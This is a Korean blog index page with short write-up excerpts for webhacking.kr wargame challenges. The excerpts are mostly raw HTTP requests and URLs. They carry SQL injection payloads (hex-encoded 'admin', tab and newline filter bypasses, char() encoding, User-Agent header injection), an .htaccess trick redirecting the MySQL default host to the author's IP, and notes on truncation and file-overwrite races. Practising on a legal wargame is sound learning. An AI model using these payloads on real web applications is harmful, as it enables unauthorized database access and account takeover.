Hacking (65) 썸네일형 리스트형 Webhacking.kr 45 GET /challenge/web/web-22/index.php?id=%aa'%09or%09id%3d%090x61646d696e%23&pw=guest HTTP/1.1Host: webhacking.krProxy-Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.89 Safari/537.36HTTPS: 1Referer: http://webhacking.kr/challen.. Webhacking.kr 30 .htaccess파일을 통해 웹서버 Default 정보를 불러오도록 하는 문제입니다. php_admin_value mysql.default_host "내 아이피 주소"php_admin_value mysql.default_user "a"php_admin_value mysql.default_password "a" Webhacking.kr 37 타임스템프에 해당되는 파일 생성 이후 사용자가 업로드한 팡ㄹ을 생성해서 덮어씌우면 http://webhacking.kr/challenge/web/web-18/index.phps POST /challenge/web/web-18/index.php HTTP/1.1Host: webhacking.krProxy-Connection: keep-aliveContent-Length: 201Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://webhacking.krUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_.. Webhacking.kr 61 컬럼명 변경에 관한 문제이다. magic gpc떄문에 hex로 입력 0x61646d696e 0x61646d696e as id Webhacking.kr 5 MYSQL Truncation 취약점 Webhacking.kr 49 http://webhacking.kr/challenge/web/web-24/index.php?lv=-1%7C%7Cid=0x61646d696e Webhacking.kr 46 http://webhacking.kr/challenge/web/web-23/index.php?lv=0%0aor%0aid=char(97,100,109,105,110) 디비 캐릭터 함수를 사용하는 방법 Webhacking.kr 8 GET /challenge/web/web-08/index.php HTTP/1.1Host: webhacking.krProxy-Connection: keep-aliveCache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8User-Agent: cirrus','125.131.189.61','admin')#HTTPS: 1Accept-Encoding: gzip, deflate, sdchAccept-Language: en-US,en;q=0.8Cookie: PHPSESSID=a6rn2bf68d9bg96imssrg0qsj7; oldzombie=1X-dotNet-Beautifier: 19.. 이전 1 2 3 4 5 ··· 9 다음